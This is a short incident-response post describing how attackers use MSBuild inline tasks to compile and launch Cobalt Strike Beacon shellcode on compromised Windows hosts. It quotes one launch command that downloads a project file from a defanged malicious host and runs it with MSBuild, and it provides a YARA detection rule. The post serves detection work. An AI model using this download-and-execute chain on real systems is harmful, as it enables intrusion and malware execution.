Cobalt Strike Beacon and MSBuild

More in General
- We helped Apple fix a vulnerability in the kernel of its operating systems
We helped Apple fix a vulnerability in the kernel of its operating systems PT ESC expert…
- Recovering EVTX records: carving methods
Recovering EVTX records: carving methods 🧩 When investigating incidents where attackers encrypt virtual machine images, a…
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Your Zimbra server is at risk
Recently, our PT ESC IR team encountered a new attack by ransomware groups on Zimbra mail…
- He's not your gsocket
He's not gsocket to you 😑 During the investigation of one of the incidents, PT ESC…
🥷 Cobalt Strike Beacon and MSBuild
The practice of our incident investigations shows that threat actors are still using the Microsoft Build Engine to compile .NET and launch Cobalt Strike Beacon on compromised hosts.
First, a .NET project configuration in XML format is uploaded to the host. The configuration contains an inline task.
The task code is described in the following structure:
<Task> <Code Type="Fragment" Language="cs"> <![CDATA[...]]> </Code> </Task>
A task is a block of executable code with which MSBuild performs atomic operations that developers use during the project build process. In the case under consideration, the threat actors use this mechanism to launch malware.
After the configuration is successfully uploaded, MSBuild is launched with the path to the project configuration specified as a parameter. As a result, a .NET library is compiled and executed on the compromised host. It decrypts the payload and calls the EnumChildWindows function, which executes the shellcode.
Launch example:
wget https://maliciouswebsite[.]com/doWqkwoown/update.csproj -O C:\Windows\Temp\update.csproj; C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Temp\update.csproj
Yara:
rule Susp_Microsoft_Build_Engine_XML_Schema {
strings:
$s1 = "TaskFactory=\"CodeTaskFactory"
$s2 = "VirtualAllocEx(0xFFFFFFFF, 0, (UInt32)"
$e1 = "EnumChildWindows"
$e2 = "EnumDisplayMonitors"
condition:
all of ($s*) and any of ($e*)
}

#dfir #hunt #detect #yara #win
@ptescalator
More in General
- We helped Apple fix a vulnerability in the kernel of its operating systems
We helped Apple fix a vulnerability in the kernel of its operating systems PT ESC expert…
- Recovering EVTX records: carving methods
Recovering EVTX records: carving methods 🧩 When investigating incidents where attackers encrypt virtual machine images, a…
- Operation Chewbacca
At the end of June, the PT ESC team, during incident investigations, discovered a new group…
- Your Zimbra server is at risk
Recently, our PT ESC IR team encountered a new attack by ransomware groups on Zimbra mail…
- He's not your gsocket
He's not gsocket to you 😑 During the investigation of one of the incidents, PT ESC…



